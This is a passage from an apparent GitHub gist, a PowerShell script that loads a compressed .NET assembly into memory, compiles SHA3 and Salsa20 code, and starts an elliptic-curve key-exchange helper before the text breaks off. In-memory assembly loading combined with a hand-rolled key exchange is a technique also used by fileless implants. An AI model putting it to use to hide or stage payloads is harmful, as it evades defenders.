Created
December 7, 2019 20:56
-
-
Save xsuperbug/27b0d4868e1b7a468f94d66a7f919349 to your computer and use it in GitHub Desktop.
test
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Load Rebex ECC DLL for net20 | |
# Source: http://labs.rebex.net/curves | |
$EncodedCompressedFile = @' | |
 | |
'@ | |
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress) | |
$UncompressedFileBytes = New-Object Byte[](563200) | |
$DeflatedStream.Read($UncompressedFileBytes, 0, 563200) | Out-Null | |
[Reflection.Assembly]::Load($UncompressedFileBytes) | Out-Null | |
# Load SHA3 and Salsa20 | |
# Source: https://gist.github.com/FrankSpierings/3577b0365d02df6f7eeb | |
# Source: https://gist.github.com/FrankSpierings/c18da658e06948313fff | |
$source = @" | |
using System; | |
using System.Diagnostics; | |
using Org.BouncyCastle.Utilities; | |
namespace Org.BouncyCastle.Crypto.Digests | |
{ | |
/// <summary> | |
/// Implementation of Keccak based on following KeccakNISTInterface.c from http://keccak.noekeon.org/ | |
/// </summary> | |
/// <remarks> | |
/// Following the naming conventions used in the C source code to enable easy review of the implementation. | |
/// </remarks> | |
public class KeccakDigest | |
{ | |
private static readonly ulong[] KeccakRoundConstants = KeccakInitializeRoundConstants(); | |
private static readonly int[] KeccakRhoOffsets = KeccakInitializeRhoOffsets(); | |
private static ulong[] KeccakInitializeRoundConstants() | |
{ | |
ulong[] keccakRoundConstants = new ulong[24]; | |
byte LFSRState = 0x01; | |
for (int i = 0; i < 24; i++) | |
{ | |
keccakRoundConstants[i] = 0; | |
for (int j = 0; j < 7; j++) | |
{ | |
int bitPosition = (1 << j) - 1; | |
// LFSR86540 | |
bool loBit = (LFSRState & 0x01) != 0; | |
if (loBit) | |
{ | |
keccakRoundConstants[i] ^= 1UL << bitPosition; | |
} | |
bool hiBit = (LFSRState & 0x80) != 0; | |
LFSRState <<= 1; | |
if (hiBit) | |
{ | |
LFSRState ^= 0x71; | |
} | |
} | |
} | |
return keccakRoundConstants; | |
} | |
private static int[] KeccakInitializeRhoOffsets() | |
{ | |
int[] keccakRhoOffsets = new int[25]; | |
int x, y, t, newX, newY; | |
int rhoOffset = 0; | |
keccakRhoOffsets[(((0) % 5) + 5 * ((0) % 5))] = rhoOffset; | |
x = 1; | |
y = 0; | |
for (t = 1; t < 25; t++) | |
{ | |
//rhoOffset = ((t + 1) * (t + 2) / 2) % 64; | |
rhoOffset = (rhoOffset + t) & 63; | |
keccakRhoOffsets[(((x) % 5) + 5 * ((y) % 5))] = rhoOffset; | |
newX = (0 * x + 1 * y) % 5; | |
newY = (2 * x + 3 * y) % 5; | |
x = newX; | |
y = newY; | |
} | |
return keccakRhoOffsets; | |
} | |
protected byte[] state = new byte[(1600 / 8)]; | |
protected byte[] dataQueue = new byte[(1536 / 8)]; | |
protected int rate; | |
protected int bitsInQueue; | |
protected int fixedOutputLength; | |
protected bool squeezing; | |
protected int bitsAvailableForSqueezing; | |
protected byte[] chunk; | |
protected byte[] oneByte; | |
private void ClearDataQueueSection(int off, int len) | |
{ | |
for (int i = off; i != off + len; i++) | |
{ | |
dataQueue[i] = 0; | |
} | |
} | |
public KeccakDigest() | |
: this(288) | |
{ | |
} | |
public KeccakDigest(int bitLength) | |
{ | |
Init(bitLength); | |
} | |
public KeccakDigest(KeccakDigest source) | |
{ | |
CopyIn(source); | |
} | |
private void CopyIn(KeccakDigest source) | |
{ | |
Array.Copy(source.state, 0, this.state, 0, source.state.Length); | |
Array.Copy(source.dataQueue, 0, this.dataQueue, 0, source.dataQueue.Length); | |
this.rate = source.rate; | |
this.bitsInQueue = source.bitsInQueue; | |
this.fixedOutputLength = source.fixedOutputLength; | |
this.squeezing = source.squeezing; | |
this.bitsAvailableForSqueezing = source.bitsAvailableForSqueezing; | |
this.chunk = Arrays.Clone(source.chunk); | |
this.oneByte = Arrays.Clone(source.oneByte); | |
} | |
public virtual string AlgorithmName | |
{ | |
get { return "Keccak-" + fixedOutputLength; } | |
} | |
public virtual int GetDigestSize() | |
{ | |
return fixedOutputLength / 8; | |
} | |
public virtual void Update(byte input) | |
{ | |
oneByte[0] = input; | |
Absorb(oneByte, 0, 8L); | |
} | |
public virtual void BlockUpdate(byte[] input, int inOff, int len) | |
{ | |
Absorb(input, inOff, len * 8L); | |
} | |
public virtual int DoFinal(byte[] output, int outOff) | |
{ | |
Squeeze(output, outOff, fixedOutputLength); | |
Reset(); | |
return GetDigestSize(); | |
} | |
/* | |
* TODO Possible API change to support partial-byte suffixes. | |
*/ | |
protected virtual int DoFinal(byte[] output, int outOff, byte partialByte, int partialBits) | |
{ | |
if (partialBits > 0) | |
{ | |
oneByte[0] = partialByte; | |
Absorb(oneByte, 0, partialBits); | |
} | |
Squeeze(output, outOff, fixedOutputLength); | |
Reset(); | |
return GetDigestSize(); | |
} | |
public virtual void Reset() | |
{ | |
Init(fixedOutputLength); | |
} | |
/** | |
* Return the size of block that the compression function is applied to in bytes. | |
* | |
* @return internal byte length of a block. | |
*/ | |
public virtual int GetByteLength() | |
{ | |
return rate / 8; | |
} | |
private void Init(int bitLength) | |
{ | |
switch (bitLength) | |
{ | |
case 128: | |
InitSponge(1344, 256); | |
break; | |
case 224: | |
InitSponge(1152, 448); | |
break; | |
case 256: | |
InitSponge(1088, 512); | |
break; | |
case 288: | |
InitSponge(1024, 576); | |
break; | |
case 384: | |
InitSponge(832, 768); | |
break; | |
case 512: | |
InitSponge(576, 1024); | |
break; | |
default: | |
throw new ArgumentException("must be one of 128, 224, 256, 288, 384, or 512.", "bitLength"); | |
} | |
} | |
private void InitSponge(int rate, int capacity) | |
{ | |
if (rate + capacity != 1600) | |
{ | |
throw new InvalidOperationException("rate + capacity != 1600"); | |
} | |
if ((rate <= 0) || (rate >= 1600) || ((rate % 64) != 0)) | |
{ | |
throw new InvalidOperationException("invalid rate value"); | |
} | |
this.rate = rate; | |
// this is never read, need to check to see why we want to save it | |
// this.capacity = capacity; | |
this.fixedOutputLength = 0; | |
Arrays.Fill(this.state, (byte)0); | |
Arrays.Fill(this.dataQueue, (byte)0); | |
this.bitsInQueue = 0; | |
this.squeezing = false; | |
this.bitsAvailableForSqueezing = 0; | |
this.fixedOutputLength = capacity / 2; | |
this.chunk = new byte[rate / 8]; | |
this.oneByte = new byte[1]; | |
} | |
private void AbsorbQueue() | |
{ | |
KeccakAbsorb(state, dataQueue, rate / 8); | |
bitsInQueue = 0; | |
} | |
protected virtual void Absorb(byte[] data, int off, long databitlen) | |
{ | |
long i, j, wholeBlocks; | |
if ((bitsInQueue % 8) != 0) | |
{ | |
throw new InvalidOperationException("attempt to absorb with odd length queue."); | |
} | |
if (squeezing) | |
{ | |
throw new InvalidOperationException("attempt to absorb while squeezing."); | |
} | |
i = 0; | |
while (i < databitlen) | |
{ | |
if ((bitsInQueue == 0) && (databitlen >= rate) && (i <= (databitlen - rate))) | |
{ | |
wholeBlocks = (databitlen - i) / rate; | |
for (j = 0; j < wholeBlocks; j++) | |
{ | |
Array.Copy(data, (int)(off + (i / 8) + (j * chunk.Length)), chunk, 0, chunk.Length); | |
KeccakAbsorb(state, chunk, chunk.Length); | |
} | |
i += wholeBlocks * rate; | |
} | |
else | |
{ | |
int partialBlock = (int)(databitlen - i); | |
if (partialBlock + bitsInQueue > rate) | |
{ | |
partialBlock = rate - bitsInQueue; | |
} | |
int partialByte = partialBlock % 8; | |
partialBlock -= partialByte; | |
Array.Copy(data, off + (int)(i / 8), dataQueue, bitsInQueue / 8, partialBlock / 8); | |
bitsInQueue += partialBlock; | |
i += partialBlock; | |
if (bitsInQueue == rate) | |
{ | |
AbsorbQueue(); | |
} | |
if (partialByte > 0) | |
{ | |
int mask = (1 << partialByte) - 1; | |
dataQueue[bitsInQueue / 8] = (byte)(data[off + ((int)(i / 8))] & mask); | |
bitsInQueue += partialByte; | |
i += partialByte; | |
} | |
} | |
} | |
} | |
private void PadAndSwitchToSqueezingPhase() | |
{ | |
if (bitsInQueue + 1 == rate) | |
{ | |
dataQueue[bitsInQueue / 8] |= (byte)(1U << (bitsInQueue % 8)); | |
AbsorbQueue(); | |
ClearDataQueueSection(0, rate / 8); | |
} | |
else | |
{ | |
ClearDataQueueSection((bitsInQueue + 7) / 8, rate / 8 - (bitsInQueue + 7) / 8); | |
dataQueue[bitsInQueue / 8] |= (byte)(1U << (bitsInQueue % 8)); | |
} | |
dataQueue[(rate - 1) / 8] |= (byte)(1U << ((rate - 1) % 8)); | |
AbsorbQueue(); | |
if (rate == 1024) | |
{ | |
KeccakExtract1024bits(state, dataQueue); | |
bitsAvailableForSqueezing = 1024; | |
} | |
else | |
{ | |
KeccakExtract(state, dataQueue, rate / 64); | |
bitsAvailableForSqueezing = rate; | |
} | |
squeezing = true; | |
} | |
protected virtual void Squeeze(byte[] output, int offset, long outputLength) | |
{ | |
long i; | |
int partialBlock; | |
if (!squeezing) | |
{ | |
PadAndSwitchToSqueezingPhase(); | |
} | |
if ((outputLength % 8) != 0) | |
{ | |
throw new InvalidOperationException("outputLength not a multiple of 8"); | |
} | |
i = 0; | |
while (i < outputLength) | |
{ | |
if (bitsAvailableForSqueezing == 0) | |
{ | |
KeccakPermutation(state); | |
if (rate == 1024) | |
{ | |
KeccakExtract1024bits(state, dataQueue); | |
bitsAvailableForSqueezing = 1024; | |
} | |
else | |
{ | |
KeccakExtract(state, dataQueue, rate / 64); | |
bitsAvailableForSqueezing = rate; | |
} | |
} | |
partialBlock = bitsAvailableForSqueezing; | |
if ((long)partialBlock > outputLength - i) | |
{ | |
partialBlock = (int)(outputLength - i); | |
} | |
Array.Copy(dataQueue, (rate - bitsAvailableForSqueezing) / 8, output, offset + (int)(i / 8), partialBlock / 8); | |
bitsAvailableForSqueezing -= partialBlock; | |
i += partialBlock; | |
} | |
} | |
private static void FromBytesToWords(ulong[] stateAsWords, byte[] state) | |
{ | |
for (int i = 0; i < (1600 / 64); i++) | |
{ | |
stateAsWords[i] = 0; | |
int index = i * (64 / 8); | |
for (int j = 0; j < (64 / 8); j++) | |
{ | |
stateAsWords[i] |= ((ulong)state[index + j] & 0xff) << ((8 * j)); | |
} | |
} | |
} | |
private static void FromWordsToBytes(byte[] state, ulong[] stateAsWords) | |
{ | |
for (int i = 0; i < (1600 / 64); i++) | |
{ | |
int index = i * (64 / 8); | |
for (int j = 0; j < (64 / 8); j++) | |
{ | |
state[index + j] = (byte)(stateAsWords[i] >> (8 * j)); | |
} | |
} | |
} | |
private void KeccakPermutation(byte[] state) | |
{ | |
ulong[] longState = new ulong[state.Length / 8]; | |
FromBytesToWords(longState, state); | |
KeccakPermutationOnWords(longState); | |
FromWordsToBytes(state, longState); | |
} | |
private void KeccakPermutationAfterXor(byte[] state, byte[] data, int dataLengthInBytes) | |
{ | |
for (int i = 0; i < dataLengthInBytes; i++) | |
{ | |
state[i] ^= data[i]; | |
} | |
KeccakPermutation(state); | |
} | |
private void KeccakPermutationOnWords(ulong[] state) | |
{ | |
int i; | |
for (i = 0; i < 24; i++) | |
{ | |
Theta(state); | |
Rho(state); | |
Pi(state); | |
Chi(state); | |
Iota(state, i); | |
} | |
} | |
ulong[] C = new ulong[5]; | |
private void Theta(ulong[] A) | |
{ | |
for (int x = 0; x < 5; x++) | |
{ | |
C[x] = 0; | |
for (int y = 0; y < 5; y++) | |
{ | |
C[x] ^= A[x + 5 * y]; | |
} | |
} | |
for (int x = 0; x < 5; x++) | |
{ | |
ulong dX = ((((C[(x + 1) % 5]) << 1) ^ ((C[(x + 1) % 5]) >> (64 - 1)))) ^ C[(x + 4) % 5]; | |
for (int y = 0; y < 5; y++) | |
{ | |
A[x + 5 * y] ^= dX; | |
} | |
} | |
} | |
private void Rho(ulong[] A) | |
{ | |
for (int x = 0; x < 5; x++) | |
{ | |
for (int y = 0; y < 5; y++) | |
{ | |
int index = x + 5 * y; | |
A[index] = ((KeccakRhoOffsets[index] != 0) ? (((A[index]) << KeccakRhoOffsets[index]) ^ ((A[index]) >> (64 - KeccakRhoOffsets[index]))) : A[index]); | |
} | |
} | |
} | |
ulong[] tempA = new ulong[25]; | |
private void Pi(ulong[] A) | |
{ | |
Array.Copy(A, 0, tempA, 0, tempA.Length); | |
for (int x = 0; x < 5; x++) | |
{ | |
for (int y = 0; y < 5; y++) | |
{ | |
A[y + 5 * ((2 * x + 3 * y) % 5)] = tempA[x + 5 * y]; | |
} | |
} | |
} | |
ulong[] chiC = new ulong[5]; | |
private void Chi(ulong[] A) | |
{ | |
for (int y = 0; y < 5; y++) | |
{ | |
for (int x = 0; x < 5; x++) | |
{ | |
chiC[x] = A[x + 5 * y] ^ ((~A[(((x + 1) % 5) + 5 * y)]) & A[(((x + 2) % 5) + 5 * y)]); | |
} | |
for (int x = 0; x < 5; x++) | |
{ | |
A[x + 5 * y] = chiC[x]; | |
} | |
} | |
} | |
private static void Iota(ulong[] A, int indexRound) | |
{ | |
A[(((0) % 5) + 5 * ((0) % 5))] ^= KeccakRoundConstants[indexRound]; | |
} | |
private void KeccakAbsorb(byte[] byteState, byte[] data, int dataInBytes) | |
{ | |
KeccakPermutationAfterXor(byteState, data, dataInBytes); | |
} | |
private void KeccakExtract1024bits(byte[] byteState, byte[] data) | |
{ | |
Array.Copy(byteState, 0, data, 0, 128); | |
} | |
private void KeccakExtract(byte[] byteState, byte[] data, int laneCount) | |
{ | |
Array.Copy(byteState, 0, data, 0, laneCount * 8); | |
} | |
// public virtual IMemoable Copy() | |
// { | |
// return new KeccakDigest(this); | |
// } | |
// public virtual void Reset(IMemoable other) | |
// { | |
// KeccakDigest d = (KeccakDigest)other; | |
// CopyIn(d); | |
// } | |
} | |
} | |
namespace Org.BouncyCastle.Crypto.Digests | |
{ | |
/// <summary> | |
/// Implementation of SHA-3 based on following KeccakNISTInterface.c from http://keccak.noekeon.org/ | |
/// </summary> | |
/// <remarks> | |
/// Following the naming conventions used in the C source code to enable easy review of the implementation. | |
/// </remarks> | |
public class Sha3Digest | |
: KeccakDigest | |
{ | |
private static int CheckBitLength(int bitLength) | |
{ | |
switch (bitLength) | |
{ | |
case 224: | |
case 256: | |
case 384: | |
case 512: | |
return bitLength; | |
default: | |
throw new ArgumentException(bitLength + " not supported for SHA-3", "bitLength"); | |
} | |
} | |
public Sha3Digest() | |
: this(256) | |
{ | |
} | |
public Sha3Digest(int bitLength) | |
: base(CheckBitLength(bitLength)) | |
{ | |
} | |
public Sha3Digest(Sha3Digest source) | |
: base(source) | |
{ | |
} | |
public override string AlgorithmName | |
{ | |
get { return "SHA3-" + fixedOutputLength; } | |
} | |
public override int DoFinal(byte[] output, int outOff) | |
{ | |
Absorb(new byte[]{ 0x02 }, 0, 2); | |
return base.DoFinal(output, outOff); | |
} | |
/* | |
* TODO Possible API change to support partial-byte suffixes. | |
*/ | |
protected override int DoFinal(byte[] output, int outOff, byte partialByte, int partialBits) | |
{ | |
if (partialBits < 0 || partialBits > 7) | |
throw new ArgumentException("must be in the range [0,7]", "partialBits"); | |
int finalInput = (partialByte & ((1 << partialBits) - 1)) | (0x02 << partialBits); | |
Debug.Assert(finalInput >= 0); | |
int finalBits = partialBits + 2; | |
if (finalBits >= 8) | |
{ | |
oneByte[0] = (byte)finalInput; | |
Absorb(oneByte, 0, 8); | |
finalBits -= 8; | |
finalInput >>= 8; | |
} | |
return base.DoFinal(output, outOff, (byte)finalInput, finalBits); | |
} | |
} | |
} | |
namespace Org.BouncyCastle.Utilities | |
{ | |
/// <summary> General array utilities.</summary> | |
public abstract class Arrays | |
{ | |
public static byte[] Clone( | |
byte[] data) | |
{ | |
return data == null ? null : (byte[])data.Clone(); | |
} | |
public static void Fill( | |
byte[] buf, | |
byte b) | |
{ | |
int i = buf.Length; | |
while (i > 0) | |
{ | |
buf[--i] = b; | |
} | |
} | |
} | |
} | |
"@ | |
Add-type -TypeDefinition $source -Language CSharp | |
$source = @" | |
/* | |
* This implementation of Salsa20 is ported from the reference implementation | |
* by D. J. Bernstein, which can be found at: | |
* http://cr.yp.to/snuffle/salsa20/ref/salsa20.c | |
* | |
* This work is hereby released into the Public Domain. To view a copy of the public domain dedication, | |
* visit http://creativecommons.org/licenses/publicdomain/ or send a letter to | |
* Creative Commons, 171 Second Street, Suite 300, San Francisco, California, 94105, USA. | |
*/ | |
using System; | |
using System.Diagnostics; | |
using System.Security.Cryptography; | |
using System.Text; | |
namespace Logos.Utility.Security.Cryptography | |
{ | |
/// <summary> | |
/// Implements the Salsa20 stream encryption cipher, as defined at http://cr.yp.to/snuffle.html. | |
/// </summary> | |
/// <remarks>See <a href="http://code.logos.com/blog/2008/06/salsa20_implementation_in_c_1.html">Salsa20 Implementation in C#</a>.</remarks> | |
public sealed class Salsa20 : SymmetricAlgorithm | |
{ | |
/// <summary> | |
/// Initializes a new instance of the <see cref="Salsa20"/> class. | |
/// </summary> | |
/// <exception cref="CryptographicException">The implementation of the class derived from the symmetric algorithm is not valid.</exception> | |
public Salsa20() | |
{ | |
// set legal values | |
LegalBlockSizesValue = new KeySizes[] { new KeySizes(512, 512, 0) }; | |
LegalKeySizesValue = new KeySizes[] { new KeySizes(128, 256, 128) }; | |
// set default values | |
BlockSizeValue = 512; | |
KeySizeValue = 256; | |
m_rounds = 20; | |
} | |
/// <summary> | |
/// Creates a symmetric decryptor object with the specified <see cref="SymmetricAlgorithm.Key"/> property | |
/// and initialization vector (<see cref="SymmetricAlgorithm.IV"/>). | |
/// </summary> | |
/// <param name="rgbKey">The secret key to use for the symmetric algorithm.</param> | |
/// <param name="rgbIV">The initialization vector to use for the symmetric algorithm.</param> | |
/// <returns>A symmetric decryptor object.</returns> | |
public override ICryptoTransform CreateDecryptor(byte[] rgbKey, byte[] rgbIV) | |
{ | |
// decryption and encryption are symmetrical | |
return CreateEncryptor(rgbKey, rgbIV); | |
} | |
/// <summary> | |
/// Creates a symmetric encryptor object with the specified <see cref="SymmetricAlgorithm.Key"/> property | |
/// and initialization vector (<see cref="SymmetricAlgorithm.IV"/>). | |
/// </summary> | |
/// <param name="rgbKey">The secret key to use for the symmetric algorithm.</param> | |
/// <param name="rgbIV">The initialization vector to use for the symmetric algorithm.</param> | |
/// <returns>A symmetric encryptor object.</returns> | |
public override ICryptoTransform CreateEncryptor(byte[] rgbKey, byte[] rgbIV) | |
{ | |
if (rgbKey == null) | |
throw new ArgumentNullException("rgbKey"); | |
if (!ValidKeySize(rgbKey.Length * 8)) | |
throw new CryptographicException("Invalid key size; it must be 128 or 256 bits."); | |
CheckValidIV(rgbIV, "rgbIV"); | |
return new Salsa20CryptoTransform(rgbKey, rgbIV, m_rounds); | |
} | |
/// <summary> | |
/// Generates a random initialization vector (<see cref="SymmetricAlgorithm.IV"/>) to use for the algorithm. | |
/// </summary> | |
public override void GenerateIV() | |
{ | |
// generate a random 8-byte IV | |
IVValue = GetRandomBytes(8); | |
} | |
/// <summary> | |
/// Generates a random key (<see cref="SymmetricAlgorithm.Key"/>) to use for the algorithm. | |
/// </summary> | |
public override void GenerateKey() | |
{ | |
// generate a random key | |
KeyValue = GetRandomBytes(KeySize / 8); | |
} | |
/// <summary> | |
/// Gets or sets the initialization vector (<see cref="SymmetricAlgorithm.IV"/>) for the symmetric algorithm. | |
/// </summary> | |
/// <value>The initialization vector.</value> | |
/// <exception cref="ArgumentNullException">An attempt was made to set the initialization vector to null. </exception> | |
/// <exception cref="CryptographicException">An attempt was made to set the initialization vector to an invalid size. </exception> | |
public override byte[] IV | |
{ | |
get | |
{ | |
return base.IV; | |
} | |
set | |
{ | |
CheckValidIV(value, "value"); | |
IVValue = (byte[]) value.Clone(); | |
} | |
} | |
/// <summary> | |
/// Gets or sets the number of rounds used by the Salsa20 algorithm. | |
/// </summary> | |
/// <value>The number of rounds.</value> | |
public int Rounds | |
{ | |
get | |
{ | |
return m_rounds; | |
} | |
set | |
{ | |
if (value != 8 && value != 12 && value != 20) | |
throw new ArgumentOutOfRangeException("value", "The number of rounds must be 8, 12, or 20."); | |
m_rounds = value; | |
} | |
} | |
// Verifies that iv is a legal value for a Salsa20 IV. | |
private static void CheckValidIV(byte[] iv, string paramName) | |
{ | |
if (iv == null) | |
throw new ArgumentNullException(paramName); | |
if (iv.Length != 8) | |
throw new CryptographicException("Invalid IV size; it must be 8 bytes."); | |
} | |
// Returns a new byte array containing the specified number of random bytes. | |
private static byte[] GetRandomBytes(int byteCount) | |
{ | |
byte[] bytes = new byte[byteCount]; | |
//using (RandomNumberGenerator rng = new RNGCryptoServiceProvider()) | |
RandomNumberGenerator rng = new RNGCryptoServiceProvider(); | |
rng.GetBytes(bytes); | |
return bytes; | |
} | |
int m_rounds; | |
/// <summary> | |
/// Salsa20Impl is an implementation of <see cref="ICryptoTransform"/> that uses the Salsa20 algorithm. | |
/// </summary> | |
private sealed class Salsa20CryptoTransform : ICryptoTransform | |
{ | |
public Salsa20CryptoTransform(byte[] key, byte[] iv, int rounds) | |
{ | |
Debug.Assert(key.Length == 16 || key.Length == 32, "abyKey.Length == 16 || abyKey.Length == 32", "Invalid key size."); | |
Debug.Assert(iv.Length == 8, "abyIV.Length == 8", "Invalid IV size."); | |
Debug.Assert(rounds == 8 || rounds == 12 || rounds == 20, "rounds == 8 || rounds == 12 || rounds == 20", "Invalid number of rounds."); | |
Initialize(key, iv); | |
m_rounds = rounds; | |
} | |
public bool CanReuseTransform | |
{ | |
get { return false; } | |
} | |
public bool CanTransformMultipleBlocks | |
{ | |
get { return true; } | |
} | |
public int InputBlockSize | |
{ | |
get { return 64; } | |
} | |
public int OutputBlockSize | |
{ | |
get { return 64; } | |
} | |
public int TransformBlock(byte[] inputBuffer, int inputOffset, int inputCount, byte[] outputBuffer, int outputOffset) | |
{ | |
// check arguments | |
if (inputBuffer == null) | |
throw new ArgumentNullException("inputBuffer"); | |
if (inputOffset < 0 || inputOffset >= inputBuffer.Length) | |
throw new ArgumentOutOfRangeException("inputOffset"); | |
if (inputCount < 0 || inputOffset + inputCount > inputBuffer.Length) | |
throw new ArgumentOutOfRangeException("inputCount"); | |
if (outputBuffer == null) | |
throw new ArgumentNullException("outputBuffer"); | |
if (outputOffset < 0 || outputOffset + inputCount > outputBuffer.Length) | |
throw new ArgumentOutOfRangeException("outputOffset"); | |
if (m_state == null) | |
throw new ObjectDisposedException(GetType().Name); | |
byte[] output = new byte[64]; | |
int bytesTransformed = 0; | |
while (inputCount > 0) | |
{ | |
Hash(output, m_state); | |
m_state[8] = AddOne(m_state[8]); | |
if (m_state[8] == 0) | |
{ | |
// NOTE: stopping at 2^70 bytes per nonce is user's responsibility | |
m_state[9] = AddOne(m_state[9]); | |
} | |
int blockSize = Math.Min(64, inputCount); | |
for (int i = 0; i < blockSize; i++) | |
outputBuffer[outputOffset + i] = (byte) (inputBuffer[inputOffset + i] ^ output[i]); | |
bytesTransformed += blockSize; | |
inputCount -= 64; | |
outputOffset += 64; | |
inputOffset += 64; | |
} | |
return bytesTransformed; | |
} | |
public byte[] TransformFinalBlock(byte[] inputBuffer, int inputOffset, int inputCount) | |
{ | |
if (inputCount < 0) | |
throw new ArgumentOutOfRangeException("inputCount"); | |
byte[] output = new byte[inputCount]; | |
TransformBlock(inputBuffer, inputOffset, inputCount, output, 0); | |
return output; | |
} | |
public void Dispose() | |
{ | |
if (m_state != null) | |
Array.Clear(m_state, 0, m_state.Length); | |
m_state = null; | |
} | |
private static uint Rotate(uint v, int c) | |
{ | |
return (v << c) | (v >> (32 - c)); | |
} | |
private static uint Add(uint v, uint w) | |
{ | |
return unchecked(v + w); | |
} | |
private static uint AddOne(uint v) | |
{ | |
return unchecked(v + 1); | |
} | |
private void Hash(byte[] output, uint[] input) | |
{ | |
uint[] state = (uint[]) input.Clone(); | |
for (int round = m_rounds; round > 0; round -= 2) | |
{ | |
state[4] ^= Rotate(Add(state[0], state[12]), 7); | |
state[8] ^= Rotate(Add(state[4], state[0]), 9); | |
state[12] ^= Rotate(Add(state[8], state[4]), 13); | |
state[0] ^= Rotate(Add(state[12], state[8]), 18); | |
state[9] ^= Rotate(Add(state[5], state[1]), 7); | |
state[13] ^= Rotate(Add(state[9], state[5]), 9); | |
state[1] ^= Rotate(Add(state[13], state[9]), 13); | |
state[5] ^= Rotate(Add(state[1], state[13]), 18); | |
state[14] ^= Rotate(Add(state[10], state[6]), 7); | |
state[2] ^= Rotate(Add(state[14], state[10]), 9); | |
state[6] ^= Rotate(Add(state[2], state[14]), 13); | |
state[10] ^= Rotate(Add(state[6], state[2]), 18); | |
state[3] ^= Rotate(Add(state[15], state[11]), 7); | |
state[7] ^= Rotate(Add(state[3], state[15]), 9); | |
state[11] ^= Rotate(Add(state[7], state[3]), 13); | |
state[15] ^= Rotate(Add(state[11], state[7]), 18); | |
state[1] ^= Rotate(Add(state[0], state[3]), 7); | |
state[2] ^= Rotate(Add(state[1], state[0]), 9); | |
state[3] ^= Rotate(Add(state[2], state[1]), 13); | |
state[0] ^= Rotate(Add(state[3], state[2]), 18); | |
state[6] ^= Rotate(Add(state[5], state[4]), 7); | |
state[7] ^= Rotate(Add(state[6], state[5]), 9); | |
state[4] ^= Rotate(Add(state[7], state[6]), 13); | |
state[5] ^= Rotate(Add(state[4], state[7]), 18); | |
state[11] ^= Rotate(Add(state[10], state[9]), 7); | |
state[8] ^= Rotate(Add(state[11], state[10]), 9); | |
state[9] ^= Rotate(Add(state[8], state[11]), 13); | |
state[10] ^= Rotate(Add(state[9], state[8]), 18); | |
state[12] ^= Rotate(Add(state[15], state[14]), 7); | |
state[13] ^= Rotate(Add(state[12], state[15]), 9); | |
state[14] ^= Rotate(Add(state[13], state[12]), 13); | |
state[15] ^= Rotate(Add(state[14], state[13]), 18); | |
} | |
for (int index = 0; index < 16; index++) | |
ToBytes(Add(state[index], input[index]), output, 4 * index); | |
} | |
private void Initialize(byte[] key, byte[] iv) | |
{ | |
m_state = new uint[16]; | |
m_state[1] = ToUInt32(key, 0); | |
m_state[2] = ToUInt32(key, 4); | |
m_state[3] = ToUInt32(key, 8); | |
m_state[4] = ToUInt32(key, 12); | |
byte[] constants = key.Length == 32 ? c_sigma : c_tau; | |
int keyIndex = key.Length - 16; | |
m_state[11] = ToUInt32(key, keyIndex + 0); | |
m_state[12] = ToUInt32(key, keyIndex + 4); | |
m_state[13] = ToUInt32(key, keyIndex + 8); | |
m_state[14] = ToUInt32(key, keyIndex + 12); | |
m_state[0] = ToUInt32(constants, 0); | |
m_state[5] = ToUInt32(constants, 4); | |
m_state[10] = ToUInt32(constants, 8); | |
m_state[15] = ToUInt32(constants, 12); | |
m_state[6] = ToUInt32(iv, 0); | |
m_state[7] = ToUInt32(iv, 4); | |
m_state[8] = 0; | |
m_state[9] = 0; | |
} | |
private static uint ToUInt32(byte[] input, int inputOffset) | |
{ | |
return unchecked((uint) (((input[inputOffset] | (input[inputOffset + 1] << 8)) | (input[inputOffset + 2] << 16)) | (input[inputOffset + 3] << 24))); | |
} | |
private static void ToBytes(uint input, byte[] output, int outputOffset) | |
{ | |
unchecked | |
{ | |
output[outputOffset] = (byte) input; | |
output[outputOffset + 1] = (byte) (input >> 8); | |
output[outputOffset + 2] = (byte) (input >> 16); | |
output[outputOffset + 3] = (byte) (input >> 24); | |
} | |
} | |
static readonly byte[] c_sigma = Encoding.ASCII.GetBytes("expand 32-byte k"); | |
static readonly byte[] c_tau = Encoding.ASCII.GetBytes("expand 16-byte k"); | |
uint[] m_state; | |
readonly int m_rounds; | |
} | |
} | |
} | |
"@ | |
Add-Type -TypeDefinition $source -Language CSharp -ErrorAction Stop | |
function Get-SHA3 ($Bytes) { | |
$SHA3 = New-Object Org.BouncyCastle.Crypto.Digests.Sha3Digest(256) | |
[Byte[]]$Digest = (1..$SHA3.GetDigestSize()) |% {0} | |
$SHA3.BlockUpdate($Bytes, 0, $Bytes.Length) | |
$SHA3.DoFinal($Digest, 0) | Out-Null | |
return $Digest | |
} | |
function Convert-Salsa20 ($Bytes, $Key, $IV) { | |
$salsa20 = New-Object Logos.Utility.Security.Cryptography.Salsa20 | |
$salsa20.IV = $IV | |
$salsa20.Key = $Key | |
$enc = $salsa20.CreateEncryptor() | |
[Byte[]]$encrypted = (1..$bytes.Length) |% {0} | |
$enc.TransformBlock($bytes, 0, $bytes.Length, $encrypted, 0) | Out-Null | |
return $encrypted | |
} | |
function Convert-StringToHex ($String) { | |
return ([System.BitConverter]::ToString([System.Text.Encoding]::UTF8.GetBytes($String)).split("-") -join "") | |
} | |
function Convert-BytesToHex ($Bytes) { | |
return ([System.BitConverter]::ToString($Bytes) -replace '-') | |
} | |
function Convert-HexToBytes ($Hex) { | |
[byte[]]$Bytes = @() | |
for ($x = 0; $x -lt $Hex.Length; $x += 2) { | |
$Bytes += [Convert]::ToInt16(($Hex[$x..($x+1)] -join ""),16) | |
} | |
return $Bytes | |
} | |
function Convert-HexToString ($Hex) { | |
$StringData = "" | |
while ($Hex.Length -gt 0) { | |
$StringData += [string][char][Convert]::ToInt16(($Hex[0..1] -join ""),16) | |
$Hex = $Hex.Substring(2) | |
} | |
return $StringData | |
} | |
function Get-SharedSecret ($client_private_key, $server_public_key_x, $server_public_key_y) { | |
$client_private_key_bigint = New-Object Org.BouncyCastle.Math.BigInteger(1, [byte[]](Convert-HexToBytes $client_private_key.ToString())) | |
$server_public_key_x_bigint = New-Object Org.BouncyCastle.Math.BigInteger(1, [byte[]](Convert-HexToBytes $server_public_key_x.ToString())) | |
$server_public_key_y_bigint = New-Object Org.BouncyCastle.Math.BigInteger(1, [byte[]](Convert-HexToBytes $server_public_key_y.ToString())) | |
